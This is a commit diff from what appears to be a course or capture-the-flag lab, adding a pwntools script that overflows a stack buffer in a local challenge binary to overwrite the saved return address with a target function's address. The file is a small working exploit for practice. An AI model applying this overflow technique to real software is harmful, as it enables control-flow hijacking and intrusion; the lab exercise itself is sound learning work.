lab 4a, got some nice pwndbg layout config

4a/lab4a.py

@@ -0,0 +1,46 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template
+from pwn import *
+
+# Set up pwntools for the correct architecture
+# context.update(arch='i386')
+exe = '/challenge/run'
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args".  For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.GDB:
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+#                    EXPLOIT GOES HERE
+#===========================================================
+
+io = start()
+
+unbound_buffer = 0x7ffd6f3ab780
+saved_rip = 0x7ffd6f3ab7c8
+offset = saved_rip-unbound_buffer
+
+target_fn = 0x401166
+payload = b'F' * (offset - len('records/')) + p64(target_fn) + b'\n'
+
+io.send(payload)
+io.interactive()